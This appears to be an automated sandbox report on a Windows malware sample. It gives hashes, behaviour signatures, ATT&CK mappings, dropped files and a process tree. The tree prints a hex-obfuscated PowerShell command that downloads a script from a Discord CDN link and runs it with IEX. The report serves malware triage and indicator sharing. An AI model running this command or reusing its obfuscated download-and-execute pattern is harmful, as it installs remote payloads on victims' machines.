0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522

General

Target

0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
Size

7KB
MD5

0152ba660d23a2bb6edda5078fc936fa
SHA1

253c14c6dd3e5aaa224b2cb6bfc9a53012896776
SHA256

0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522
SHA512

8c2dbe5d3dce477f24d80b2221bc3ebd48bdc923bb599758e116ef4db05f91c392e484e0f46e072809108d11fc7433481f01b3f7d7a0e184114daad8ee5ab666

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 872 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

872 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 872 powershell.exe

flow	pid	process
7	872	powershell.exe

pid	process
872	powershell.exe

description	pid	process
Token: SeDebugPrivilege	872	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exeWScript.execmd.exe

description	pid	process	target process
PID 2040 wrote to memory of 2008	2040	0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe	WScript.exe
PID 2040 wrote to memory of 2008	2040	0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe	WScript.exe
PID 2040 wrote to memory of 2008	2040	0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe	WScript.exe
PID 2008 wrote to memory of 568	2008	WScript.exe	cmd.exe
PID 2008 wrote to memory of 568	2008	WScript.exe	cmd.exe
PID 2008 wrote to memory of 568	2008	WScript.exe	cmd.exe
PID 568 wrote to memory of 872	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 872	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 872	568	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
"C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "$link = 'https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg';$hex = '28 4E 65 77 2D 4F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E 57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 53 74 72 69 6E 67 28 22 24 6C 69 6E 6B 22 29 20 7C 20 49 45 58';$hex.Split(' ') | forEach{[char]([convert]::toint16($_,16))} | forEach{$result=$result+$_};$result | iex"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat
MD5
53c8f257e3d32009e9e087dd8ed38da9

SHA1
ed4f3487930634c56fc02e6d4272eb93a84d7836

SHA256
3bb009df04fe062f749515ac36ff348958e8fbfb8897a6d6e0cb34f86e76dd3f

SHA512
96c2b00f6c2b876fc0ad47ec68fa414c570c8903924c71d4428fa4878f88d8519a3bcd1c435b480a4959f58ad41802397897dc0ae4cda1a212bf656afe1a9332

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs
MD5
232174031b9591e1add2320bf6da9f14

SHA1
3f2722464c176abc974441f21fbdeba071d67f5d

SHA256
5694b52e005c385d6807e02e45af35cbe39af18bb31325901ac86a633ceb68f7

SHA512
d675d843204b6aa7077376588dc6ba493a9c300f0f45403daaddb5c4ec8183dec856de966a3fd43e67423674a1240f294b36baec5defb567a474050baa6c51e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\key.bin
MD5
138a4669ce7b2e27012c9f4ffc3993fe

SHA1
20f6df71b5d0e20e6ffa7474e3f95cb87b5a8fd0

SHA256
83a39301950ddd38becff29f6645556fa25b1eea21148a40ae26ecdafc603206

SHA512
cae661b658bd171702614162c2da42fa42c72070a806535167a33923b94855f81504ca2e18b6584aba04650a303e29d1eaada86c6e57171a9badd28112a5e09d

Download Submit
memory/568-59-0x0000000000000000-mapping.dmp

Download
memory/872-65-0x0000000002872000-0x0000000002874000-memory.dmp

Filesize
8KB

Download
memory/872-60-0x0000000000000000-mapping.dmp

Download
memory/872-62-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp

Filesize
11.4MB

Download
memory/872-64-0x0000000002870000-0x0000000002872000-memory.dmp

Filesize
8KB

Download
memory/872-66-0x0000000002874000-0x0000000002877000-memory.dmp

Filesize
12KB

Download
memory/872-63-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/872-67-0x000000000287B000-0x000000000289A000-memory.dmp

Filesize
124KB

Download
memory/2008-57-0x000007FEFB651000-0x000007FEFB653000-memory.dmp

Filesize
8KB

Download
memory/2008-55-0x0000000000000000-mapping.dmp

Download
memory/2040-53-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing